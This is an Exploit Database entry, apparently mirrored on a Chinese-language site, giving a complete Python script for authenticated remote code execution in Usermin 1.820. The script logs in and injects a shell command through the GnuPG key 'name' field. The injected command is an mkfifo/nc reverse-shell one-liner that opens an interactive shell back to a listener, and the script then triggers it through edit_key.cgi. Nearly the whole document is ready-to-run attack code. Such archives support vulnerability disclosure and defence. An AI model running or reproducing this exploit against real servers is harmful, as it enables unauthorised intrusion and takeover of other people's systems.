Usermin 1.820 – Remote Code Execution (RCE) (Authenticated)

• Exploit Database
• 37 阅读

• 作者： numan türle
  日期： 2021-08-30
• 类别：

  • webapps
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/50234/

• # Title: Usermin 1.820 - Remote Code Execution (RCE) (Authenticated)
  # Date: 27.08.2021
  # Author: Numan Türle
  # Vendor Homepage: https://www.webmin.com/usermin.html
  # Software Link: https://github.com/webmin/usermin
  # Version: <=1820
  # https://www.youtube.com/watch?v=wiRIWFAhz24
  
  #!/usr/bin/python3
  # -*- coding: utf-8 -*-
  # Usermin - Remote Code Execution (Authenticated) ( Version 1.820 )
  # author: twitter.com/numanturle
  # usage: usermin.py [-h] -u HOST -l LOGIN -p PASSWORD
  # https://youtu.be/wiRIWFAhz24
  
  
  import argparse,requests,warnings,json,re
  from requests.packages.urllib3.exceptions import InsecureRequestWarning
  from cmd import Cmd
  
  warnings.simplefilter('ignore',InsecureRequestWarning)
  
  def init():
  parser = argparse.ArgumentParser(description='Usermin - Remote Code Execution (Authenticated) ( Version 1.820 )')
  parser.add_argument('-u','--host',help='Host', type=str, required=True)
  parser.add_argument('-l', '--login',help='Username', type=str, required=True)
  parser.add_argument('-p', '--password',help='Password', type=str, required=True)
  args = parser.parse_args()
  exploit(args)
  
  def exploit(args):
  
  listen_ip = "0.0.0.0"
  listen_port = 1337
  
  session = requests.Session()
  target = "https://{}:20000".format(args.host)
  username = args.login
  password = args.password
  
  print("[+] Target {}".format(target))
  
  headers = {
  'Cookie': 'redirect=1; testing=1;',
  'Referer': target
  }
  
  login = session.post(target+"/session_login.cgi", headers=headers, verify=False, data={"user":username,"pass":password})
  login_content = str(login.content)
  search = "webmin_search.cgi"
  check_login_string = re.findall(search,login_content)
  if check_login_string:
  session_hand_login = session.cookies.get_dict()
  
  print("[+] Login successfully")
  print("[+] Setup GnuPG")
  
  payload = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f;".format(listen_ip,listen_port)
  #payload = "whoami;"
  post_data = {
  "name":'";{}echo "'.format(payload),
  "email":"1337@webmin.com",
  }
  
  print("[+] Payload {}".format(post_data))
  
  session.headers.update({'referer': target})
  
  create_secret = session.post(target+"/gnupg/secret.cgi", verify=False, data=post_data)
  create_secret_content = str(create_secret.content)
  
  search = "successfully"
  check_exp = re.findall(search,create_secret_content)
  
  if check_exp:
  
  print("[+] Setup successful")
  print("[+] Fetching key list")
  
  session.headers.update({'referer': target})
  key_list = session.post(target+"/gnupg/list_keys.cgi", verify=False)
  last_gets_key = re.findall("edit_key.cgi\?(.*?)'",str(key_list.content))[-2]
  print("[+] Key : {}".format(last_gets_key))
  
  session.headers.update({'referer': target})
  try:
  key_list = session.post(target+"/gnupg/edit_key.cgi?{}".format(last_gets_key), verify=False, timeout=3)
  except requests.exceptions.ReadTimeout:
  pass
  
  print("[+] 5ucc355fully_3xpl017")
  else:
  print("[-] an unexpected error occurred")
  
  
  
  
  else:
  print("[-] AUTH : Login failed.")
  
  if __name__ == "__main__":
  init()